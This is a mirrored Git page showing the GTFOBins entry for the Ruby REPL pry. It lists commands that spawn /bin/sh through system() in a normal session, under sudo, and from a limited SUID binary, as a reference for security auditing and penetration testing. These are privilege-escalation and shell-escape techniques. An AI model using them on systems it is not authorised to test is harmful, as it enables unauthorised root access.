1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/pry.md

16 lines
215 B
Markdown
Raw Permalink Normal View History

2020-03-17 08:49:25 +01:00
---
functions:
shell:
- code: |
pry
system("/bin/sh")
sudo:
- code: |
sudo pry
system("/bin/sh")
2020-03-17 20:48:08 +01:00
limited-suid:
- code: |
./pry
system("/bin/sh")
2020-03-17 08:49:25 +01:00
---